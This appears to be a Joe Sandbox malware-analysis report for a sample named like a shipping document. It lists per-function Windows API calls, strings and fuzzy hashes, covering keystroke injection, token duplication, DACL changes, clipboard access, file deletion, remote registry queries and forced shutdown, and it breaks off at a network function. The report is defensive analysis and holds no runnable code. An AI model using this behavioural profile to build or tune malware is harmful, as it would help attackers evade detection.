Snapshot File: hcaresult_0_2_90000_Shipping report#Cargo Handling.jbxd

Similarity

API ID: MessageSend$MenuWindow$InfoItemText$Longwsprintf
String ID: %d/%02d/%02d
API String ID: 4054740463-328681919
Opcode ID: 487d07effab0bb07cfe26510aec7c55b2d160ae67d9d30f99ee63ece0e6793fd
Instruction ID: 8ca851f89ff7d951c187943d232120f805290ba0cb5d5f8712fee287180be461
Opcode Fuzzy Hash: 487d07effab0bb07cfe26510aec7c55b2d160ae67d9d30f99ee63ece0e6793fd
Instruction Fuzzy Hash: 4E12D271600224ABEB298F68EC49FEE7BF8EF85710F104119F516DB2E1DB749951CB90

Function 000AF98E Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 130keyboardthreadwindowCOMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32(00000000,00000000,00000000), ref: 000AF998
FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 000EF474
IsIconic.USER32(00000000), ref: 000EF47D
ShowWindow.USER32(00000000,00000009), ref: 000EF48A
SetForegroundWindow.USER32(00000000), ref: 000EF494
GetWindowThreadProcessId.USER32(00000000,00000000), ref: 000EF4AA
GetCurrentThreadId.KERNEL32 ref: 000EF4B1
GetWindowThreadProcessId.USER32(00000000,00000000), ref: 000EF4BD
AttachThreadInput.USER32(?,00000000,00000001), ref: 000EF4CE
AttachThreadInput.USER32(?,00000000,00000001), ref: 000EF4D6
AttachThreadInput.USER32(00000000,000000FF,00000001), ref: 000EF4DE
SetForegroundWindow.USER32(00000000), ref: 000EF4E1
MapVirtualKeyW.USER32(00000012,00000000), ref: 000EF4F6
keybd_event.USER32(00000012,00000000), ref: 000EF501
MapVirtualKeyW.USER32(00000012,00000000), ref: 000EF50B
keybd_event.USER32(00000012,00000000), ref: 000EF510
MapVirtualKeyW.USER32(00000012,00000000), ref: 000EF519
keybd_event.USER32(00000012,00000000), ref: 000EF51E
MapVirtualKeyW.USER32(00000012,00000000), ref: 000EF528
keybd_event.USER32(00000012,00000000), ref: 000EF52D
SetForegroundWindow.USER32(00000000), ref: 000EF530
AttachThreadInput.USER32(?,000000FF,00000000), ref: 000EF557

Strings

Shell_TrayWnd, xrefs: 000EF46F

Memory Dump Source

Source File: 00000000.00000002.1878961509.0000000000091000.00000020.00000001.01000000.00000003.sdmp, Offset: 00090000, based on PE: true

Associated: 00000000.00000002.1878943847.0000000000090000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.000000000012C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879071163.000000000015C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879090258.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_90000_Shipping report#Cargo Handling.jbxd

Similarity

API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
String ID: Shell_TrayWnd
API String ID: 4125248594-2988720461
Opcode ID: 1a9e362b9897dc904391e92338549c67a643eb7c2472570cf71d8e6352c0d739
Instruction ID: 5a96d7b1abec899877aa26860bef58b05df0d5610cf1a95df7159d4a8b4aed28
Opcode Fuzzy Hash: 1a9e362b9897dc904391e92338549c67a643eb7c2472570cf71d8e6352c0d739
Instruction Fuzzy Hash: BE315071A40218BEEB316BB65C4AFBF7E6CEB44B50F100065FB01F61D1D6B09951AEA0

Function 000F1201 Relevance: 38.7, APIs: 19, Strings: 3, Instructions: 241COMMON

Download Yara Rule

APIs

Part of subcall function 000F16C3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 000F170D
Part of subcall function 000F16C3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 000F173A
Part of subcall function 000F16C3: GetLastError.KERNEL32 ref: 000F174A

LogonUserW.ADVAPI32(?,?,?,00000000,00000000,?), ref: 000F1286
DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?), ref: 000F12A8
CloseHandle.KERNEL32(?), ref: 000F12B9
OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 000F12D1
GetProcessWindowStation.USER32 ref: 000F12EA
SetProcessWindowStation.USER32(00000000), ref: 000F12F4
OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 000F1310

Part of subcall function 000F10BF: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,000F11FC), ref: 000F10D4
Part of subcall function 000F10BF: CloseHandle.KERNEL32(?,?,000F11FC), ref: 000F10E9

Strings

, xrefs: 000F125A
winsta0, xrefs: 000F12CC
default, xrefs: 000F130B

Memory Dump Source

Source File: 00000000.00000002.1878961509.0000000000091000.00000020.00000001.01000000.00000003.sdmp, Offset: 00090000, based on PE: true

Associated: 00000000.00000002.1878943847.0000000000090000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.000000000012C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879071163.000000000015C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879090258.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_90000_Shipping report#Cargo Handling.jbxd

Similarity

API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLogonLookupPrivilegeUserValue
String ID: $default$winsta0
API String ID: 22674027-1027155976
Opcode ID: c5cbc49e84bd86100d4a5107717894e7aee41779330e50daab8edabe444669e8
Instruction ID: 6c7cc67f924453e7cb8acf83aded89b1aa3ae41eb52b6b7978506e7eab50578a
Opcode Fuzzy Hash: c5cbc49e84bd86100d4a5107717894e7aee41779330e50daab8edabe444669e8
Instruction Fuzzy Hash: B8818671900209FFDF24DFA4DC49BFE7BB9AF48700F144129FA11A66A1C7309A95DBA0

Function 000F0B62 Relevance: 31.7, APIs: 21, Instructions: 202memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 000F10F9: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 000F1114
Part of subcall function 000F10F9: GetLastError.KERNEL32(?,00000000,00000000,?,?,000F0B9B,?,?,?), ref: 000F1120
Part of subcall function 000F10F9: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,000F0B9B,?,?,?), ref: 000F112F
Part of subcall function 000F10F9: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,000F0B9B,?,?,?), ref: 000F1136
Part of subcall function 000F10F9: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 000F114D

GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 000F0BCC
GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 000F0C00
GetLengthSid.ADVAPI32(?), ref: 000F0C17
GetAce.ADVAPI32(?,00000000,?), ref: 000F0C51
AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 000F0C6D
GetLengthSid.ADVAPI32(?), ref: 000F0C84
GetProcessHeap.KERNEL32(00000008,00000008), ref: 000F0C8C
HeapAlloc.KERNEL32(00000000), ref: 000F0C93
GetLengthSid.ADVAPI32(?,00000008,?), ref: 000F0CB4
CopySid.ADVAPI32(00000000), ref: 000F0CBB
AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 000F0CEA
SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 000F0D0C
SetUserObjectSecurity.USER32(?,00000004,?), ref: 000F0D1E
GetProcessHeap.KERNEL32(00000000,00000000), ref: 000F0D45
HeapFree.KERNEL32(00000000), ref: 000F0D4C
GetProcessHeap.KERNEL32(00000000,00000000), ref: 000F0D55
HeapFree.KERNEL32(00000000), ref: 000F0D5C
GetProcessHeap.KERNEL32(00000000,00000000), ref: 000F0D65
HeapFree.KERNEL32(00000000), ref: 000F0D6C
GetProcessHeap.KERNEL32(00000000,?), ref: 000F0D78
HeapFree.KERNEL32(00000000), ref: 000F0D7F

Part of subcall function 000F1193: GetProcessHeap.KERNEL32(00000008,000F0BB1,?,00000000,?,000F0BB1,?), ref: 000F11A1
Part of subcall function 000F1193: HeapAlloc.KERNEL32(00000000,?,00000000,?,000F0BB1,?), ref: 000F11A8
Part of subcall function 000F1193: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,000F0BB1,?), ref: 000F11B7

Memory Dump Source

Source File: 00000000.00000002.1878961509.0000000000091000.00000020.00000001.01000000.00000003.sdmp, Offset: 00090000, based on PE: true

Associated: 00000000.00000002.1878943847.0000000000090000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.000000000012C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879071163.000000000015C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879090258.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_90000_Shipping report#Cargo Handling.jbxd

Similarity

API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
String ID:
API String ID: 4175595110-0
Opcode ID: 8ef80e8950332fde0b0ef85301c1b5b4e868271d947d8e8aeedf660043b9205d
Instruction ID: 4ad28c777fbf1f593c58389c150466cf8acf67c1178b5fe4e4d53cf78a36f67c
Opcode Fuzzy Hash: 8ef80e8950332fde0b0ef85301c1b5b4e868271d947d8e8aeedf660043b9205d
Instruction Fuzzy Hash: 5971697690020AFBDF20DFA4DC45BFEBBB9BF04300F044515FA14A6692D771AA56DBA0

Function 0010EAFF Relevance: 30.2, APIs: 20, Instructions: 191clipboardfileCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32(0012CC08), ref: 0010EB29
IsClipboardFormatAvailable.USER32(0000000D), ref: 0010EB37
GetClipboardData.USER32(0000000D), ref: 0010EB43
CloseClipboard.USER32 ref: 0010EB4F
GlobalLock.KERNEL32(00000000), ref: 0010EB87
CloseClipboard.USER32 ref: 0010EB91
GlobalUnlock.KERNEL32(00000000), ref: 0010EBBC
IsClipboardFormatAvailable.USER32(00000001), ref: 0010EBC9
GetClipboardData.USER32(00000001), ref: 0010EBD1
GlobalLock.KERNEL32(00000000), ref: 0010EBE2
GlobalUnlock.KERNEL32(00000000), ref: 0010EC22
IsClipboardFormatAvailable.USER32(0000000F), ref: 0010EC38
GetClipboardData.USER32(0000000F), ref: 0010EC44
GlobalLock.KERNEL32(00000000), ref: 0010EC55
DragQueryFileW.SHELL32(00000000,000000FF,00000000,00000000), ref: 0010EC77
DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 0010EC94
DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 0010ECD2
GlobalUnlock.KERNEL32(00000000), ref: 0010ECF3
CountClipboardFormats.USER32 ref: 0010ED14
CloseClipboard.USER32 ref: 0010ED59

Memory Dump Source

Source File: 00000000.00000002.1878961509.0000000000091000.00000020.00000001.01000000.00000003.sdmp, Offset: 00090000, based on PE: true

Associated: 00000000.00000002.1878943847.0000000000090000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.000000000012C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879071163.000000000015C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879090258.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_90000_Shipping report#Cargo Handling.jbxd

Similarity

API ID: Clipboard$Global$AvailableCloseDataDragFileFormatLockQueryUnlock$CountFormatsOpen
String ID:
API String ID: 420908878-0
Opcode ID: 76cf145854cd4b67676242e755a88dd93b6ca0bb0f61fd891843a31ed8b0a1e0
Instruction ID: 211fda43db894f43ff2b70ee1603c8f1993e158304b2a07e16c0daa9c6242589
Opcode Fuzzy Hash: 76cf145854cd4b67676242e755a88dd93b6ca0bb0f61fd891843a31ed8b0a1e0
Instruction Fuzzy Hash: 9161ED30204201AFD710EF65D894F6E77E4EF84704F04491DF996972E2CBB1E986CBA2

Function 0010698F Relevance: 21.4, APIs: 7, Strings: 5, Instructions: 363timefileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 001069BE
FindClose.KERNEL32(00000000), ref: 00106A12
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00106A4E
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00106A75

Part of subcall function 00099CB3: _wcslen.LIBCMT ref: 00099CBD

FileTimeToSystemTime.KERNEL32(?,?), ref: 00106AB2
FileTimeToSystemTime.KERNEL32(?,?), ref: 00106ADF

Strings

%4d%02d%02d%02d%02d%02d%03d, xrefs: 00106B32
%4d%02d%02d%02d%02d%02d, xrefs: 00106B6A
%4d, xrefs: 00106BB1
%02d, xrefs: 00106C00, 00106C0A, 00106C5A, 00106CAA, 00106CFA, 00106D4A
%03d, xrefs: 00106DA2

Memory Dump Source

Source File: 00000000.00000002.1878961509.0000000000091000.00000020.00000001.01000000.00000003.sdmp, Offset: 00090000, based on PE: true

Associated: 00000000.00000002.1878943847.0000000000090000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.000000000012C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879071163.000000000015C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879090258.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_90000_Shipping report#Cargo Handling.jbxd

Similarity

API ID: Time$File$FindLocalSystem$CloseFirst_wcslen
String ID: %02d$%03d$%4d$%4d%02d%02d%02d%02d%02d$%4d%02d%02d%02d%02d%02d%03d
API String ID: 3830820486-3289030164
Opcode ID: de31abc7477e05ea64b84bb63e14631c889bb1a7fbb909f4e39ea96b955b6059
Instruction ID: 64b93ecfa8b6aeb3cddb79e10b17cf861d09121d7b68d5eedf6510de0b85dbd6
Opcode Fuzzy Hash: de31abc7477e05ea64b84bb63e14631c889bb1a7fbb909f4e39ea96b955b6059
Instruction Fuzzy Hash: 4FD140B2508300AEC714EBA4C891EEFB7ECAF98704F44491DF589D7192EB74DA44DB62

Function 00109642 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 118fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 00109663
GetFileAttributesW.KERNEL32(?), ref: 001096A1
SetFileAttributesW.KERNEL32(?,?), ref: 001096BB
FindNextFileW.KERNEL32(00000000,?), ref: 001096D3
FindClose.KERNEL32(00000000), ref: 001096DE
FindFirstFileW.KERNEL32(*.*,?), ref: 001096FA
SetCurrentDirectoryW.KERNEL32(?), ref: 0010974A
SetCurrentDirectoryW.KERNEL32(00156B7C), ref: 00109768
FindNextFileW.KERNEL32(00000000,00000010), ref: 00109772
FindClose.KERNEL32(00000000), ref: 0010977F
FindClose.KERNEL32(00000000), ref: 0010978F

Strings

*.*, xrefs: 001096F5

Memory Dump Source

Source File: 00000000.00000002.1878961509.0000000000091000.00000020.00000001.01000000.00000003.sdmp, Offset: 00090000, based on PE: true

Associated: 00000000.00000002.1878943847.0000000000090000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.000000000012C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879071163.000000000015C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879090258.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_90000_Shipping report#Cargo Handling.jbxd

Similarity

API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
String ID: *.*
API String ID: 1409584000-438819550
Opcode ID: 1d7ff587e3d717b46ca67681b5af4e401b0c73e17f4649ab8bdd8f15653def9f
Instruction ID: 55ce454645ac11a3a248bfbbf995555faa957672b8cbe407a3fae4ebdf711b02
Opcode Fuzzy Hash: 1d7ff587e3d717b46ca67681b5af4e401b0c73e17f4649ab8bdd8f15653def9f
Instruction Fuzzy Hash: AA310232641219BECB24EFB4DC18ADE73ACAF09321F104195F990E20E1DB74DA848E94

Function 0010979D Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 111fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 001097BE
FindNextFileW.KERNEL32(00000000,?), ref: 00109819
FindClose.KERNEL32(00000000), ref: 00109824
FindFirstFileW.KERNEL32(*.*,?), ref: 00109840
SetCurrentDirectoryW.KERNEL32(?), ref: 00109890
SetCurrentDirectoryW.KERNEL32(00156B7C), ref: 001098AE
FindNextFileW.KERNEL32(00000000,00000010), ref: 001098B8
FindClose.KERNEL32(00000000), ref: 001098C5
FindClose.KERNEL32(00000000), ref: 001098D5

Part of subcall function 000FDAE5: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 000FDB00

Strings

*.*, xrefs: 0010983B

Memory Dump Source

Source File: 00000000.00000002.1878961509.0000000000091000.00000020.00000001.01000000.00000003.sdmp, Offset: 00090000, based on PE: true

Associated: 00000000.00000002.1878943847.0000000000090000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.000000000012C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879071163.000000000015C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879090258.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_90000_Shipping report#Cargo Handling.jbxd

Similarity

API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
String ID: *.*
API String ID: 2640511053-438819550
Opcode ID: 8c6c0e4a363afd69e2aea28098ac491b93060bc56b86a09df281e9e858de53e1
Instruction ID: 7183f011b6a8891be76e42ba9c42839cc8c34b8a31e56b23c3f91cb949d22ece
Opcode Fuzzy Hash: 8c6c0e4a363afd69e2aea28098ac491b93060bc56b86a09df281e9e858de53e1
Instruction Fuzzy Hash: A231283150121DBEDF20EFB4EC58ADE73ACAF06320F148156E990A31D2DB74DD95CAA4

Function 0011BE44 Relevance: 17.0, APIs: 11, Instructions: 456registryCOMMON

Download Yara Rule

APIs

Part of subcall function 0011C998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0011B6AE,?,?), ref: 0011C9B5
Part of subcall function 0011C998: _wcslen.LIBCMT ref: 0011C9F1
Part of subcall function 0011C998: _wcslen.LIBCMT ref: 0011CA68
Part of subcall function 0011C998: _wcslen.LIBCMT ref: 0011CA9E

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0011BF3E
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?,?), ref: 0011BFA9
RegCloseKey.ADVAPI32(00000000), ref: 0011BFCD
RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 0011C02C
RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 0011C0E7
RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 0011C154
RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 0011C1E9
RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,00000000,?,?,?,00000000), ref: 0011C23A
RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 0011C2E3
RegCloseKey.ADVAPI32(?,?,00000000), ref: 0011C382
RegCloseKey.ADVAPI32(00000000), ref: 0011C38F

Memory Dump Source

Source File: 00000000.00000002.1878961509.0000000000091000.00000020.00000001.01000000.00000003.sdmp, Offset: 00090000, based on PE: true

Associated: 00000000.00000002.1878943847.0000000000090000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.000000000012C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879071163.000000000015C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879090258.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_90000_Shipping report#Cargo Handling.jbxd

Similarity

API ID: QueryValue$Close_wcslen$BuffCharConnectOpenRegistryUpper
String ID:
API String ID: 3102970594-0
Opcode ID: 8d3c4229734dd0208d8f50a8d79300324ed656038b3df9806348b294767299b4
Instruction ID: 7fb02ea520be21f889986568134ab956d818ee717c9853622fd6c4efbabd0db5
Opcode Fuzzy Hash: 8d3c4229734dd0208d8f50a8d79300324ed656038b3df9806348b294767299b4
Instruction Fuzzy Hash: 7B024E71604200AFD718CF28C895E6AB7E5BF49304F19C4ADF459CB2A2D731ED86CB92

Function 00108195 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 186timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?), ref: 00108257
SystemTimeToFileTime.KERNEL32(?,?), ref: 00108267
LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00108273
GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00108310
SetCurrentDirectoryW.KERNEL32(?), ref: 00108324
SetCurrentDirectoryW.KERNEL32(?), ref: 00108356
SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 0010838C
SetCurrentDirectoryW.KERNEL32(?), ref: 00108395

Strings

*.*, xrefs: 0010839B

Memory Dump Source

Source File: 00000000.00000002.1878961509.0000000000091000.00000020.00000001.01000000.00000003.sdmp, Offset: 00090000, based on PE: true

Associated: 00000000.00000002.1878943847.0000000000090000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.000000000012C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879071163.000000000015C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879090258.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_90000_Shipping report#Cargo Handling.jbxd

Similarity

API ID: CurrentDirectoryTime$File$Local$System
String ID: *.*
API String ID: 1464919966-438819550
Opcode ID: c1dbffcbe902876a3640108018b97611f58e89abdecc071bda5e8ae2a6854356
Instruction ID: e46a1ad1950cd9f97bb466c56ce9f276d09b851ebcf2fcff41c069610f271b14
Opcode Fuzzy Hash: c1dbffcbe902876a3640108018b97611f58e89abdecc071bda5e8ae2a6854356
Instruction Fuzzy Hash: D0616C725087059FDB10EF64D8409AEB3E8FF89314F04492EF9D987252EB71E945CB92

Function 000FD076 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 172fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00093AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00093A97,?,?,00092E7F,?,?,?,00000000), ref: 00093AC2

Part of subcall function 000FE199: GetFileAttributesW.KERNEL32(?,000FCF95), ref: 000FE19A

FindFirstFileW.KERNEL32(?,?), ref: 000FD122
DeleteFileW.KERNEL32(?,?,?,?,?,00000000,?,?,?), ref: 000FD1DD
MoveFileW.KERNEL32(?,?), ref: 000FD1F0
DeleteFileW.KERNEL32(?,?,?,?), ref: 000FD20D
FindNextFileW.KERNEL32(00000000,00000010), ref: 000FD237

Part of subcall function 000FD29C: CopyFileExW.KERNEL32(?,?,00000000,00000000,00000000,00000008,?,?,000FD21C,?,?), ref: 000FD2B2

FindClose.KERNEL32(00000000,?,?,?), ref: 000FD253
FindClose.KERNEL32(00000000), ref: 000FD264

Strings

\*.*, xrefs: 000FD0CD, 000FD0D6, 000FD0EB

Memory Dump Source

Source File: 00000000.00000002.1878961509.0000000000091000.00000020.00000001.01000000.00000003.sdmp, Offset: 00090000, based on PE: true

Associated: 00000000.00000002.1878943847.0000000000090000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.000000000012C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879071163.000000000015C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879090258.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_90000_Shipping report#Cargo Handling.jbxd

Similarity

API ID: File$Find$CloseDelete$AttributesCopyFirstFullMoveNameNextPath
String ID: \*.*
API String ID: 1946585618-1173974218
Opcode ID: 7e9808ea7d92cf561bfaf06a5b22791cd9c784e7b5441c41861278c1726183e1
Instruction ID: 14eb13e82208489efc038d822a86efd376e144629836181ec2a79ed3b343443d
Opcode Fuzzy Hash: 7e9808ea7d92cf561bfaf06a5b22791cd9c784e7b5441c41861278c1726183e1
Instruction Fuzzy Hash: C6616F3180110DABCF15EBE4D9929FDB7B6AF25300F64416AE50177192EF316F09EBA1

Function 0010ED6A Relevance: 13.6, APIs: 9, Instructions: 102clipboardmemoryCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 0010ED91
EmptyClipboard.USER32 ref: 0010ED97
GlobalAlloc.KERNEL32(00000002,?), ref: 0010EDAC
CloseClipboard.USER32 ref: 0010EEA3

Memory Dump Source

Source File: 00000000.00000002.1878961509.0000000000091000.00000020.00000001.01000000.00000003.sdmp, Offset: 00090000, based on PE: true

Associated: 00000000.00000002.1878943847.0000000000090000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.000000000012C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879071163.000000000015C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879090258.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_90000_Shipping report#Cargo Handling.jbxd

Similarity

API ID: Clipboard$AllocCloseEmptyGlobalOpen
String ID:
API String ID: 1737998785-0
Opcode ID: e697edf25cdfcb46a4cc1da83fab37471d23d9839535b72ff3dbcfc623850986
Instruction ID: 03e8a062c2e631748f34f53d0929cc5de4249863e078a57a093b02c0ae6d3d92
Opcode Fuzzy Hash: e697edf25cdfcb46a4cc1da83fab37471d23d9839535b72ff3dbcfc623850986
Instruction Fuzzy Hash: 57419F35604611AFE720DF16D848F59BBE1EF44318F15C499E4598BBA2C775EC82CBD0

Function 000FE8F6 Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 57shutdownCOMMON

Download Yara Rule

APIs

Part of subcall function 000F16C3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 000F170D
Part of subcall function 000F16C3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 000F173A
Part of subcall function 000F16C3: GetLastError.KERNEL32 ref: 000F174A

ExitWindowsEx.USER32(?,00000000), ref: 000FE932

Strings

, xrefs: 000FE95C
@, xrefs: 000FE925
, xrefs: 000FE920
SeShutdownPrivilege, xrefs: 000FE902

Memory Dump Source

Source File: 00000000.00000002.1878961509.0000000000091000.00000020.00000001.01000000.00000003.sdmp, Offset: 00090000, based on PE: true

Associated: 00000000.00000002.1878943847.0000000000090000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.000000000012C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879071163.000000000015C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879090258.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_90000_Shipping report#Cargo Handling.jbxd

Similarity

API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
String ID: $ $@$SeShutdownPrivilege
API String ID: 2234035333-3163812486
Opcode ID: 5ccd69a760c9c7cad797ab35b036b3ed2a439f791f9bf73ab29231fcb36eadfb
Instruction ID: 785160f9ee3fb7891d2c4ba86ee817ebac3698c7888f862d73ec04ccd8e63aca
Opcode Fuzzy Hash: 5ccd69a760c9c7cad797ab35b036b3ed2a439f791f9bf73ab29231fcb36eadfb
Instruction Fuzzy Hash: 1301F232614219BBEB6426B4DC86FFF729C9B14741F140521FB02E28E2DAE05C80A1E0

Function 00111204 Relevance: 12.1, APIs: 8, Instructions: 113networkCOMMON

Download Yara Rule

APIs

